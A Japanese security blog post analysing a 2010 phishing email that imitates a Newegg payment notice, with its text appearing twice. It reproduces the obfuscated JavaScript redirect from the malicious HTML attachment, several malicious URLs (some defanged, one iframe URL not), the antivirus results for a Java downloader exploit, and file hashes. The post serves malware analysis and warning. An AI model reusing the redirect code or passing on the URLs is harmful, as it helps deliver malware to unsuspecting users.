【今日の誘導メール】前門の虎後門の狼系
件名
Newegg.com - Payment Charged
本文
Newegg.com - Payment Charged
Customer ID: 353455
AccountNumber: 47346765765
Hello,
Thank you for shopping at Newegg.com.
We are happy to inform you that your order (Sales Order Number: 134564535)has been successfully charged to your VISA and orderverification is now complete.
Please find attached invoice.
Once You Know, You Newegg.
Your Newegg.com Customer Service Team
Newegg.com,9997 E. Rose Hills Road, Whittier, CA. 90601 | 2000-2010 Newegg Inc.All rights reserved.
添付ファイル
NewEgg Invoice.html 含まれるスクリプト部分
function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;document.location.href=string("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;<
誘導先 → h丁丁p://tracebook.us/1.html
メタタグ → h丁丁p://cetogilco.cz.cc/scanner10/?afid=24
aguse.jpで調べてみると、今日は生きてない。そういうことか!。

iframeタグ → http://windows-portal.in/3/index.php?message=151&on=back&navig=ddd&pool=ssl
こちらの方は、
h丁丁p://windows-portal.in/home/j.php が落ちてきて
MD5: f6c79355101b4c382d2bb3e12e7b4fe2
Date first seen: 2010-06-17 17:50:15 (UTC)
Date last seen: 2010-08-24 12:36:27 (UTC)
Detection ratio: 16/42
ウイルスチェック結果
Newegg.com - Payment Charged
本文
Newegg.com - Payment Charged
Customer ID: 353455
AccountNumber: 47346765765
Hello,
Thank you for shopping at Newegg.com.
We are happy to inform you that your order (Sales Order Number: 134564535)has been successfully charged to your VISA and orderverification is now complete.
Please find attached invoice.
Once You Know, You Newegg.
Your Newegg.com Customer Service Team
Newegg.com,9997 E. Rose Hills Road, Whittier, CA. 90601 | 2000-2010 Newegg Inc.All rights reserved.
添付ファイル
NewEgg Invoice.html 含まれるスクリプト部分
function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;document.location.href=string("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;<
誘導先 → h丁丁p://tracebook.us/1.html
メタタグ → h丁丁p://cetogilco.cz.cc/scanner10/?afid=24
aguse.jpで調べてみると、今日は生きてない。そういうことか!。

iframeタグ → http://windows-portal.in/3/index.php?message=151&on=back&navig=ddd&pool=ssl
こちらの方は、
h丁丁p://windows-portal.in/home/j.php が落ちてきて
MD5: f6c79355101b4c382d2bb3e12e7b4fe2
Date first seen: 2010-06-17 17:50:15 (UTC)
Date last seen: 2010-08-24 12:36:27 (UTC)
Detection ratio: 16/42
ウイルスチェック結果
Antivirus | Version | Last update | Result |
---|---|---|---|
AhnLab-V3 | 2010.08.24.00 | 2010.08.23 | - |
AntiVir | 8.2.4.38 | 2010.08.24 | JAVA/Dldr.Agent.W |
Antiy-AVL | 2.0.3.7 | 2010.08.23 | - |
Authentium | 5.2.0.5 | 2010.08.24 | - |
Avast | 4.8.1351.0 | 2010.08.23 | Java:Agent-BA |
Avast5 | 5.0.332.0 | 2010.08.23 | Java:Agent-BA |
AVG | 9.0.0.851 | 2010.08.24 | Generic2_c.BOMJ |
BitDefender | 7.2 | 2010.08.24 | - |
CAT-QuickHeal | 11.00 | 2010.08.24 | - |
ClamAV | 0.96.2.0-git | 2010.08.24 | Trojan.Java.Rowindal |
Comodo | 5843 | 2010.08.24 | - |
DrWeb | 5.0.2.03300 | 2010.08.24 | - |
Emsisoft | 5.0.0.37 | 2010.08.24 | Trojan.Java.Rowindal!IK |
eSafe | 7.0.17.0 | 2010.08.23 | - |
eTrust-Vet | 36.1.7810 | 2010.08.23 | - |
F-Prot | 4.6.1.107 | 2010.08.24 | - |
F-Secure | 9.0.15370.0 | 2010.08.24 | Trojan:Java/Rowindal.A |
Fortinet | 4.1.143.0 | 2010.08.24 | - |
GData | 21 | 2010.08.24 | Java:Agent-BA |
Ikarus | T3.1.1.88.0 | 2010.08.24 | Trojan.Java.Rowindal |
Jiangmin | 13.0.900 | 2010.08.23 | - |
Kaspersky | 7.0.0.125 | 2010.08.24 | Exploit.Java.CVE-2010-0094.a |
McAfee | 5.400.0.1158 | 2010.08.24 | - |
McAfee-GW-Edition | 2010.1B | 2010.08.24 | - |
Microsoft | 1.6103 | 2010.08.24 | Trojan:Java/Rowindal.A |
NOD32 | 5393 | 2010.08.24 | a variant of Java/Rowindal.A |
Norman | 6.05.11 | 2010.08.24 | Java/Rowindal.B |
nProtect | 2010-08-24.01 | 2010.08.24 | - |
Panda | 10.0.2.7 | 2010.08.24 | - |
PCTools | 7.0.3.5 | 2010.08.24 | - |
Prevx | 3.0 | 2010.08.24 | - |
Rising | 22.62.01.04 | 2010.08.24 | - |
Sophos | 4.56.0 | 2010.08.24 | Mal/JavaDldr-B |
Sunbelt | 6784 | 2010.08.24 | - |
SUPERAntiSpyware | 4.40.0.1006 | 2010.08.24 | - |
Symantec | 20101.1.1.7 | 2010.08.24 | - |
TheHacker | 6.5.2.1.355 | 2010.08.24 | - |
TrendMicro | 9.120.0.1004 | 2010.08.24 | TROJ_JAVA.BM |
TrendMicro-HouseCall | 9.120.0.1004 | 2010.08.24 | TROJ_JAVA.AQ |
VBA32 | 3.12.14.0 | 2010.08.24 | - |
ViRobot | 2010.8.24.4005 | 2010.08.24 | - |
VirusBuster | 5.0.27.0 | 2010.08.23 | - |
MD5: f6c79355101b4c382d2bb3e12e7b4fe2 |
SHA1: 4487aaae64abd6b47a331dca6404e113a2ffde14 |
SHA256: 0997384a932a2278a5e5dc19de075bcd758ba8e2ef5b23b2b8d341f613c22cc6 |
File size: 8429 bytes |
Scan date: 2010-08-24 12:36:27 (UTC) |
コメント
月別アーカイブ
- 2017/06 (1)
- 2015/12 (1)
- 2015/10 (2)
- 2015/09 (1)
- 2014/04 (1)
- 2014/03 (2)
- 2014/01 (1)
- 2013/10 (2)
- 2013/09 (2)
- 2013/04 (1)
- 2013/03 (1)
- 2013/02 (1)
- 2013/01 (2)
- 2012/12 (2)
- 2012/11 (3)
- 2012/10 (2)
- 2012/09 (3)
- 2012/08 (3)
- 2012/07 (7)
- 2012/06 (4)
- 2012/05 (5)
- 2012/04 (5)
- 2012/03 (6)
- 2012/02 (5)
- 2012/01 (1)
- 2011/12 (1)
- 2011/11 (1)
- 2011/10 (4)
- 2011/09 (7)
- 2011/07 (7)
- 2011/06 (5)
- 2011/05 (13)
- 2011/04 (14)
- 2011/03 (20)
- 2011/02 (17)
- 2011/01 (42)
- 2010/12 (32)
- 2010/11 (39)
- 2010/10 (37)
- 2010/09 (42)
- 2010/08 (73)
- 2010/07 (81)
- 2010/06 (45)
- 2010/05 (116)
- 2010/04 (61)
- 2010/03 (60)
- 2010/02 (57)
- 2010/01 (60)
- 2009/12 (42)
- 2009/11 (53)
- 2009/10 (38)
- 2009/09 (35)
- 2009/08 (24)
- 2009/07 (15)
- 2009/06 (31)
- 2009/05 (44)
- 2009/04 (31)
- 2009/03 (33)
- 2009/02 (15)
- 2009/01 (1)
- 2008/09 (2)
- 2008/07 (2)
- 2008/06 (8)
- 2008/05 (1)
- 2008/04 (3)
- 2008/03 (11)
- 2008/02 (21)
- 2008/01 (17)
- 2007/12 (11)
- 2007/11 (8)
- 2007/10 (6)
- 2007/09 (16)
- 2007/08 (4)
- 2007/06 (9)
- 2007/05 (14)
- 2007/04 (11)
- 2007/03 (4)
- 2007/02 (3)
- 2006/12 (3)
- 2006/10 (1)
- 2006/09 (8)
- 2006/08 (2)
- 2006/07 (3)
- 2006/06 (1)
- 2006/05 (13)
- 2006/04 (4)
- 2005/12 (4)
- 2005/11 (1)
- 2005/10 (4)
- 2005/09 (13)
- 2005/08 (8)
- 2005/07 (12)
- 2005/06 (12)
- 2005/05 (1)